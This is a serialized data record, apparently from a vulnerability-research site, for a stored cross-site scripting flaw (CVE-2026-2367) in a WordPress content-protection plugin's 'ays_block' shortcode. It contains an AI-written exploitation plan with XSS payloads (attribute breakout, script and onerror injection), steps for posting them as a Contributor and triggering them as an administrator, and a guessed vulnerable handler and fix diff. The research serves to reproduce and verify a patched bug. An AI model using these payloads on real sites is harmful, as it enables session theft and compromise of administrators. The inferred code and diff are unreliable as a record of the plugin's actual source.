[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fE5dA_QaKtpEmDdPtakbdy1TsVd1noyAh32vgGE9eCx0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-2367","secure-copy-content-protection-and-content-locking-authenticated-contributor-stored-cross-site-scripting-via-shortcode-a","Secure Copy Content Protection and Content Locking \u003C= 5.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attribute","The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ays_block' shortcode in all versions up to, and including, 5.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","secure-copy-content-protection",null,"\u003C=5.0.1","5.0.2","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-24 20:52:46","2026-02-25 09:26:54",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff138d917-0dc2-4408-aa6a-db1fd0410eb4?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-2367\n\n## 1. Vulnerability Summary\nThe **Secure Copy Content Protection and Content Locking** plugin for WordPress is vulnerable to **Authenticated (Contributor+) Stored Cross-Site Scripting** via the `ays_block` shortcode. The vulnerability exists because the plugin fails to sanitize or escape user-supplied attributes within the shortcode's rendering logic. An attacker with \"Contributor\" permissions can create a post containing a malicious shortcode attribute, which will execute arbitrary JavaScript in the context of any user (including administrators) who views the post.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fpost.php` (Post Creation\u002FEdition) and the frontend post display.\n- **Shortcode:** `[ays_block]`\n- **Vulnerable Attribute:** Likely candidates include `id`, `class`, or `message` (inferred).\n- **Authentication:** Required (Contributor or higher).\n- **Preconditions:** The plugin must be active. The attacker needs the ability to use shortcodes (standard for Contributors).\n\n## 3. Code Flow (Inferred)\n1. **Registration:** The plugin registers the shortcode in its initialization phase:\n   `add_shortcode('ays_block', 'ays_block_callback_function');`\n2. **Input Handling:** When a post is saved, WordPress stores the raw shortcode string in the `wp_posts` table.\n3. **Rendering Sink:** When the post is viewed, WordPress parses the shortcode and calls the handler:\n   ```php\n   \u002F\u002F Likely inside the handler function\n   function ays_block_callback_function($atts) {\n       $a = shortcode_atts(array(\n           'id' => '',\n           'message' => ''\n       ), $atts);\n       \n       \u002F\u002F VULNERABLE SINK: Attribute echoed or returned without escaping\n       return '\u003Cdiv id=\"' . $a['id'] . '\">' . $a['message'] . '\u003C\u002Fdiv>';\n   }\n   ```\n4. **Execution:** The browser renders the unescaped attribute, triggering the XSS.\n\n## 4. Nonce Acquisition Strategy\nThis is a **Stored XSS** vulnerability. The exploit involves two phases:\n1. **Storage:** Injecting the payload into a post. This requires a standard WordPress post-editing nonce.\n2. **Execution:** Viewing the post. This requires no nonce.\n\n### Phase 1: Acquiring Post Nonce\nThe execution agent should:\n1. Log into the WordPress dashboard as a **Contributor**.\n2. Navigate to `wp-admin\u002Fpost-new.php`.\n3. Use `browser_eval` to extract the required nonces and post ID:\n   - `_wpnonce`: Found in the form with `id=\"post\"` or via `wp.data.select('core\u002Feditor').getBlocks()` if using Gutenberg.\n   - For the Classic Editor: `document.querySelector('#_wpnonce').value`\n\n## 5. Exploitation Strategy\n\n### Step 1: Create a Post with XSS Payload\nThe agent will send an authenticated POST request to create a post containing the malicious shortcode.\n\n- **Request Tool:** `http_request`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body Parameters:**\n  - `action`: `editpost`\n  - `post_ID`: `[POST_ID_FROM_STEP_4]`\n  - `_wpnonce`: `[NONCE_FROM_STEP_4]`\n  - `post_title`: `XSS Test`\n  - `content`: `[ays_block id='x\" onmouseover=\"alert(document.domain)\" style=\"display:block;width:100px;height:100px;background:red;\"']`\n  - `post_status`: `publish` (or `pending` if Contributor cannot publish)\n\n*Note: If `id` is not the sink, try attributes `class`, `style`, or `message`.*\n\n### Step 2: Trigger the XSS\n1. Identify the URL of the newly created post.\n2. Use `browser_navigate` to visit the post URL as an **Administrator**.\n3. Observe if the `alert(document.domain)` executes (or check for the injected script tag in the DOM).\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure `secure-copy-content-protection` version `\u003C= 5.0.1` is installed and active.\n2. **User Creation:**\n   ```bash\n   wp user create attacker attacker@example.com --role=contributor --user_pass=password\n   ```\n3. **Target Page:** A page or post must be initialized so the agent has a `post_ID` to work with.\n   ```bash\n   wp post create --post_type=post --post_status=draft --post_author=$(wp user get attacker --field=ID)\n   ```\n\n## 7. Expected Results\n- The HTTP request to `post.php` should return a `302` redirect to the post editor.\n- When the post is viewed on the frontend, the HTML source should contain the unescaped payload:\n  `\u003Cdiv id=\"x\" onmouseover=\"alert(document.domain)\" ...>`\n- The browser should execute the JavaScript when the element is interacted with (or automatically if using a payload like `\u003Cimg src=x onerror=alert(1)>`).\n\n## 8. Verification Steps\nAfter the HTTP exploit, use WP-CLI to verify the content was stored:\n```bash\nwp post get [POST_ID] --field=post_content\n# Check if it contains the exact malicious shortcode string\n```\nTo verify the lack of escaping in the plugin's code:\n```bash\ngrep -rn \"ays_block\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fsecure-copy-content-protection\u002F\n# Look for the function handling the shortcode and check for esc_attr() usage\n```\n\n## 9. Alternative Approaches\nIf the `id` attribute is sanitized, try breaking out of the shortcode structure:\n\n1. **Attribute Breakout:**\n   `[ays_block class='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`\n   \n2. **Classic Tag Injection:**\n   If the shortcode allows content wrapping:\n   `[ays_block]\u003Cimg src=x onerror=alert(1)>[\u002Fays_block]`\n\n3. **URL-based Payloads:**\n   If the shortcode has a URL attribute:\n   `[ays_block link='javascript:alert(1)']` (Testing for `esc_url` omission).\n\n4. **In-Admin Execution:**\n   Check if the XSS executes in the `wp-admin` post list or editor preview, which would allow for more direct privilege escalation against administrators.","The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ays_block' shortcode in versions up to and including 5.0.1. Authenticated attackers with Contributor-level access can inject arbitrary web scripts into pages by providing malicious payloads in shortcode attributes (such as 'id'), which execute when the page is viewed by another user due to missing output escaping.","\u002F\u002F Inferred registration and handler from plugin logic\nadd_shortcode('ays_block', 'ays_block_callback_function');\n\nfunction ays_block_callback_function($atts) {\n    $a = shortcode_atts(array(\n        'id' => '',\n        'message' => ''\n    ), $atts);\n    \n    \u002F\u002F VULNERABLE SINK: Attribute values are concatenated directly into HTML without escaping\n    return '\u003Cdiv id=\"' . $a['id'] . '\">' . $a['message'] . '\u003C\u002Fdiv>';\n}","--- a\u002Fincludes\u002Fclass-ays-sccp-shortcodes.php\n+++ b\u002Fincludes\u002Fclass-ays-sccp-shortcodes.php\n@@ -10,1 +10,1 @@\n-    return '\u003Cdiv id=\"' . $a['id'] . '\">' . $a['message'] . '\u003C\u002Fdiv>';\n+    return '\u003Cdiv id=\"' . esc_attr($a['id']) . '\">' . wp_kses_post($a['message']) . '\u003C\u002Fdiv>';","1. Log in to the WordPress dashboard as a user with Contributor-level permissions.\n2. Create a new post or edit an existing draft.\n3. Insert the following shortcode into the post content: [ays_block id='x\" onmouseover=\"alert(document.domain)\" style=\"display:block;width:100px;height:100px;background:red;\"'].\n4. Save the post (e.g., as a draft or pending review).\n5. Identify the frontend URL of the post and navigate to it as an administrator.\n6. Hover the mouse over the rendered red box to trigger the JavaScript alert.","gemini-3-flash-preview","2026-04-19 00:44:17","2026-04-19 00:45:48",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","5.0.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsecure-copy-content-protection\u002Ftags\u002F5.0.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsecure-copy-content-protection.5.0.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsecure-copy-content-protection\u002Ftags\u002F5.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsecure-copy-content-protection.5.0.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsecure-copy-content-protection\u002Ftags"]